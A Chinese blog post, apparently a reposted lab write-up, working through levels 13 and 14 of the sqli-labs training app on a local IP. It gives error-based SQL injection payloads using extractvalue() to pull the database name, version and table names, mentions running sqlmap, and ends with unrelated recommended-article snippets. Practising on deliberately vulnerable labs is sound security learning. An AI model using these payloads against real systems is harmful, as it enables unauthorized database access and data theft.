程序员经验分享-hwhale

sqli-labs-master第13、14关。

2023-11-10

前言:输入内容被放到双引号中,报错型注入,注释符不可用
第十三关:
http://192.168.89.134/sqli-labs-master/Less-13/
在这里插入图片描述
先输入:admin’)
在这里插入图片描述
我们还是分析一下:
在这里插入图片描述
我们接着用and来测试。
admin’) and 1=2#
在这里插入图片描述
-admin’) union selec 1,2#联合查询
在这里插入图片描述
还是没有报错,那我们就用报错语句来测试吧,这次我使用extractvalue()
显示版本,数据库
admin’) and extractvalue(1,concat(0x7e,(select database())))#
admin’) and extractvalue(1,concat(0x7e,(select version())))#
在这里插入图片描述
在这里插入图片描述
接着继续获取表名
-admin’) and (extractvalue(1,concat(0x5c,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x5c)))#
在这里插入图片描述
获取字段名
在这里插入图片描述
在这里插入图片描述
获取数据
在这里插入图片描述
十四关:
原理和十三关一样把’)换成’’

最后还是用sqlmap试一下
在这里插入图片描述
在这里插入图片描述
省略一系列步骤直接上结果
在这里插入图片描述
用sqlmap就很简单了

本文章为自己搭建实验环境做过的,参考过一些资料,希望对你有帮助

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

笔记

安全

sqli-labs-master第13、14关。 的相关文章

随机推荐

  • 本机与服务器传输数据

    1 Xftp xftp传输的速度在500kb左右 对于上GB的数据集传输时显得太慢 技巧 可以先本地压缩后再上传 上传后在服务器端用unzip命令解压即可 警告 在使用Xftp传输文件时若与服务器不甚断连 当再次重连后一定要记得整个文件重新

  • 非阻塞的connect使用方式

    connect 函数的调用涉及到3次握手 默认connect函数为阻塞连接状态 通常connect 会阻塞到三次握手的完成和失败 而这个connect阻塞超时时间会依赖于系统 一般为75s到几分钟时间 一种方式可以通过该系统配置 proc

  • 教你如何清理 Docker 存储驱动的磁盘占用空间

    Author rab 有时候你会发现 你的 Docker 业务容器虽然做了数据持久化 且数据持久化的磁盘空间占用并不大 但是 Docker 的 Overlay2 目录占用却很大 我们知道 Overlay2 是 Docker 的存储驱动 也是

  • java 读取文件 和 执行SQL脚本 (支持中文)

    读文件操作应用 执行SQL脚本文件 执行SQL脚本文件 param path throws SQLException throws ClassNotFoundException public void exeSQLScript String

  • 操作系统原理——绪论:操作系统的概念、发展、类型、基本特征、功能、运行环境和内核结构

    目录 一 操作系统的概念 1 计算机系统的概念 2 操作系统的概念 3 为什么计算机系统需要操作系统 二 操作系统的形成与发展 三 操作系统的类型 1 批处理操作系统 Batch OS 2 分时操作系统 3 实时系统 4 嵌入式操作系统 5

  • 一些关于javascript、jQuery使用时的建议

    最新地址请访问 http leeyee github io blog 2011 04 09 javascript jquery user suggests 1 在遍历数组时缓存长度 在遍历数组时应将数组的长度保存在一个变量中 不要在循环中每

  • 熊哥帮忙

    原来那个找不到文件的问题 今天咨询了熊哥 SQL gt oradebug setospid 578038 Oracle pid 3 Unix process pid 578038 image oracle orasrva DIAG SQL

  • 刷脸支付是商业社会在时间效率数据价值的挖掘

    刷脸支付这项网付方式随着时代发展人工智能技术的不断进步代替传统聚合支付方式 开始了最早的商业应用了 而在5G迅速发展的现在刷脸支付也被广泛的运用在生活中 而刷脸支付也将会推动市场发展创造全新的快捷支付 为用户提供便捷 当你线下付款时常会遇到

  • requirements.txt 的格式

    如下文 requirements txt BeautifulSoup 3 2 1 Django 1 7 Glances 2 6 2 GnuPGInterface 0 3 2 LinkChecker 9 3 Markdown 2 6 1 My

  • 新印的钞票如何流入市场?

    原文地址 http zhidao baidu com question 136634468 html 印钞厂一直在印钞票 那市场上的钞票总量一直会增加 这些新印的钞票是怎么流入市场的呢 我看到另一个和我这个相似的问题的回答是 国家通过给公务

  • kali 重置root密码

    kali版本 kali linux 2021 2 但是其他版本也都一样的操作 方法 步骤 第一步 点击开启此虚拟机 打开安装好的kali虚拟机 第二步 进入开机启动页面 按键盘e键进入Kali GNU GRUB页面 进入GNU GRUB页面

  • QTcpSocket::connectToHost内存泄漏的问题

    使用QTcpSocket上网看博客时 发现有篇抄来抄去的博客提到QTcpSocket类的方法connectToHost会泄露内存 即使把调用这个方法的QTcpSocket实例delete掉 内存也不会释放 反复connectToHost会导

  • 树莓派开启 wifi 热点

    树莓派小巧的体型当然不是为了固定放在桌子上 更是为了做成可移动的智能设备 例如智能小车 当树莓派不在室内的 wifi 下时 怎样方便地连接上它呢 于是想要把树莓派变成 wifi 热点 就能用我们的手机或者笔记本连接它了 一 修改 etc n

  • 蓝牙Mesh中的Heartbeat和Heartbeat Publication

    Heartbeat 在蓝牙Mesh网络中 Heartbeat 心跳 是一种用于监测设备在线状态和网络连通性的机制 它是由每个设备定期发送的小型消息组成 用于指示设备的存在和活动状态 Heartbeat的主要目的是确保网络中的设备处于活动状态

  • js实现---加油站问题(贪心算法)

    加油站问题 贪心算法 基本要素 贪心选择 在对问题求解时 总是做出在当前看来是最好的选择 也就是说 不从整体最优上加以考虑 他所做出的是在某种意义上的局部最优解 最优子结构 当一个问题的最优解包含其子问题的最优解时 称此问题具有最优子结构性

  • 树形结构互转

    树形结构互转 1 线性转树形 lineToTree list const list list map e gt id e id pid e parentId label e name raw e const addChild arr obj

  • TPE原理总结

    hyperopt TPE 在hyperopt tpe py 935 处打一断点 5 超参的取值 3 loss的取值 GMM1 GMM1 lpdf len dict literal broadcast best getitem sub arr

  • 三星s9系统更新无法连接服务器,三星 S9/S9+ 手机开始推送 One UI 2.1 系统固件更新...

    IT之家6月15日消息 外媒SamMobile报道 三星Galaxy S9和Galaxy S9 现在正在获取其最新的重大更新OneUI 2 1 今天开始在韩国和德国版三星S9 S9 中推送 上一周 德国版Galaxy Note9手机开始推送

  • Linux拷贝U盘文件(命令行)

    Linux系统有的有界面 有的没有只要命令窗口 因此导入外部文件就变得困难 没有可视化的方便 这里通过挂载u盘进行文件拷贝 首先挂载u盘 这里以centos为例 1 进入命令行模式下 输入命令 sudo i 获取root权限 2 mkdir

  • sqli-labs-master第13、14关。

    前言 输入内容被放到双引号中 报错型注入 注释符不可用 第十三关 http 192 168 89 134 sqli labs master Less 13 先输入 admin 我们还是分析一下 我们接着用and来测试 admin and 1

热门标签